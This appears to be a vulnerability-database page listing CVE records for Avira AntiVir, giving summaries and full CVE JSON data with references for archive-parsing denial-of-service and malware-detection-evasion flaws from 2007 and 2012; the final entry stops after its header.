Vulnerabilities related to avira - antivir
cve-2007-2973
Vulnerability from cvelistv5
Published
2007-06-01 01:00
Modified
2024-08-07 13:57
Severity ?
Summary
Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:57:54.494Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "24239",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24239",
               },
               {
                  name: "24187",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24187",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
               },
               {
                  name: "ADV-2007-1971",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2007/1971",
               },
               {
                  name: "avira-antivir-tar-dos(34557)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
               },
               {
                  name: "25417",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25417",
               },
               {
                  name: "36711",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36711",
               },
               {
                  name: "1018137",
                  tags: [
                     "vdb-entry",
                     "x_refsource_SECTRACK",
                     "x_transferred",
                  ],
                  url: "http://www.securitytracker.com/id?1018137",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
               },
               {
                  name: "20070530 n.runs-SA-2007.012 - Avira Antivir Antivirus TAR Denial of Service",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-05-23T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "24239",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24239",
            },
            {
               name: "24187",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24187",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
            },
            {
               name: "ADV-2007-1971",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2007/1971",
            },
            {
               name: "avira-antivir-tar-dos(34557)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
            },
            {
               name: "25417",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25417",
            },
            {
               name: "36711",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36711",
            },
            {
               name: "1018137",
               tags: [
                  "vdb-entry",
                  "x_refsource_SECTRACK",
               ],
               url: "http://www.securitytracker.com/id?1018137",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
            },
            {
               name: "20070530 n.runs-SA-2007.012 - Avira Antivir Antivirus TAR Denial of Service",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-2973",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "24239",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24239",
                  },
                  {
                     name: "24187",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/24187",
                  },
                  {
                     name: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                     refsource: "CONFIRM",
                     url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
                  },
                  {
                     name: "ADV-2007-1971",
                     refsource: "VUPEN",
                     url: "http://www.vupen.com/english/advisories/2007/1971",
                  },
                  {
                     name: "avira-antivir-tar-dos(34557)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
                  },
                  {
                     name: "25417",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25417",
                  },
                  {
                     name: "36711",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36711",
                  },
                  {
                     name: "1018137",
                     refsource: "SECTRACK",
                     url: "http://www.securitytracker.com/id?1018137",
                  },
                  {
                     name: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
                     refsource: "MISC",
                     url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
                  },
                  {
                     name: "20070530 n.runs-SA-2007.012 - Avira Antivir Antivirus TAR Denial of Service",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-2973",
      datePublished: "2007-06-01T01:00:00",
      dateReserved: "2007-05-31T00:00:00",
      dateUpdated: "2024-08-07T13:57:54.494Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2007-1673
Vulnerability from cvelistv5
Published
2007-05-09 01:00
Modified
2024-08-07 13:06
Severity ?
Summary
unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.
References
http://www.amavis.org/security/asa-2007-2.txt - x_refsource_CONFIRM
https://exchange.xforce.ibmcloud.com/vulnerabilities/34080 - vdb-entry, x_refsource_XF
http://osvdb.org/36208 - vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/23823 - vdb-entry, x_refsource_BID
http://secunia.com/advisories/25315 - third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/467646/100/0/threaded - mailing-list, x_refsource_BUGTRAQ
http://securityreason.com/securityalert/2680 - third-party-advisory, x_refsource_SREASON
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:06:25.976Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://www.amavis.org/security/asa-2007-2.txt",
               },
               {
                  name: "multiple-vendor-zoo-dos(34080)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
               },
               {
                  name: "36208",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36208",
               },
               {
                  name: "23823",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/23823",
               },
               {
                  name: "25315",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25315",
               },
               {
                  name: "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
               },
               {
                  name: "2680",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SREASON",
                     "x_transferred",
                  ],
                  url: "http://securityreason.com/securityalert/2680",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-04-07T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://www.amavis.org/security/asa-2007-2.txt",
            },
            {
               name: "multiple-vendor-zoo-dos(34080)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
            },
            {
               name: "36208",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36208",
            },
            {
               name: "23823",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/23823",
            },
            {
               name: "25315",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25315",
            },
            {
               name: "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
            },
            {
               name: "2680",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SREASON",
               ],
               url: "http://securityreason.com/securityalert/2680",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2007-1673",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "http://www.amavis.org/security/asa-2007-2.txt",
                     refsource: "CONFIRM",
                     url: "http://www.amavis.org/security/asa-2007-2.txt",
                  },
                  {
                     name: "multiple-vendor-zoo-dos(34080)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34080",
                  },
                  {
                     name: "36208",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/36208",
                  },
                  {
                     name: "23823",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/23823",
                  },
                  {
                     name: "25315",
                     refsource: "SECUNIA",
                     url: "http://secunia.com/advisories/25315",
                  },
                  {
                     name: "20070504 Multiple vendors ZOO file decompression infinite loop DoS",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/467646/100/0/threaded",
                  },
                  {
                     name: "2680",
                     refsource: "SREASON",
                     url: "http://securityreason.com/securityalert/2680",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2007-1673",
      datePublished: "2007-05-09T01:00:00",
      dateReserved: "2007-03-24T00:00:00",
      dateUpdated: "2024-08-07T13:06:25.976Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1457
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 19:01
Severity ?
Summary
The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html - vendor-advisory, x_refsource_SUSE
http://osvdb.org/80406 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80393 - vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/archive/1/522005 - mailing-list, x_refsource_BUGTRAQ
http://osvdb.org/80403 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80389 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80391 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80409 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80396 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80392 - vdb-entry, x_refsource_OSVDB
http://www.ieee-security.org/TC/SP2012/program.html - x_refsource_MISC
http://www.mandriva.com/security/advisories?name=MDVSA-2012:094 - vendor-advisory, x_refsource_MANDRIVA
http://www.securityfocus.com/bid/52610 - vdb-entry, x_refsource_BID
http://osvdb.org/80407 - vdb-entry, x_refsource_OSVDB
http://osvdb.org/80395 - vdb-entry, x_refsource_OSVDB
https://exchange.xforce.ibmcloud.com/vulnerabilities/74293 - vdb-entry, x_refsource_XF
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T19:01:00.540Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "openSUSE-SU-2012:0833",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_SUSE",
                     "x_transferred",
                  ],
                  url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
               },
               {
                  name: "80406",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80406",
               },
               {
                  name: "80393",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80393",
               },
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "80403",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80403",
               },
               {
                  name: "80389",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80389",
               },
               {
                  name: "80391",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80391",
               },
               {
                  name: "80409",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80409",
               },
               {
                  name: "80396",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80396",
               },
               {
                  name: "80392",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80392",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "MDVSA-2012:094",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_MANDRIVA",
                     "x_transferred",
                  ],
                  url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
               },
               {
                  name: "52610",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/52610",
               },
               {
                  name: "80407",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80407",
               },
               {
                  name: "80395",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80395",
               },
               {
                  name: "multiple-av-tar-length-evasion(74293)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-01-17T19:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "openSUSE-SU-2012:0833",
               tags: [
                  "vendor-advisory",
                  "x_refsource_SUSE",
               ],
               url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
            },
            {
               name: "80406",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80406",
            },
            {
               name: "80393",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80393",
            },
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "80403",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80403",
            },
            {
               name: "80389",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80389",
            },
            {
               name: "80391",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80391",
            },
            {
               name: "80409",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80409",
            },
            {
               name: "80396",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80396",
            },
            {
               name: "80392",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80392",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "MDVSA-2012:094",
               tags: [
                  "vendor-advisory",
                  "x_refsource_MANDRIVA",
               ],
               url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
            },
            {
               name: "52610",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/52610",
            },
            {
               name: "80407",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80407",
            },
            {
               name: "80395",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80395",
            },
            {
               name: "multiple-av-tar-length-evasion(74293)",
               tags: [
                  "vdb-entry",
                  "x_refsource_XF",
               ],
               url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1457",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "openSUSE-SU-2012:0833",
                     refsource: "SUSE",
                     url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
                  },
                  {
                     name: "80406",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80406",
                  },
                  {
                     name: "80393",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80393",
                  },
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "80403",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80403",
                  },
                  {
                     name: "80389",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80389",
                  },
                  {
                     name: "80391",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80391",
                  },
                  {
                     name: "80409",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80409",
                  },
                  {
                     name: "80396",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80396",
                  },
                  {
                     name: "80392",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80392",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "MDVSA-2012:094",
                     refsource: "MANDRIVA",
                     url: "http://www.mandriva.com/security/advisories?name=MDVSA-2012:094",
                  },
                  {
                     name: "52610",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/52610",
                  },
                  {
                     name: "80407",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80407",
                  },
                  {
                     name: "80395",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80395",
                  },
                  {
                     name: "multiple-av-tar-length-evasion(74293)",
                     refsource: "XF",
                     url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1457",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T19:01:00.540Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1425
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 18:53
Severity ?
Summary
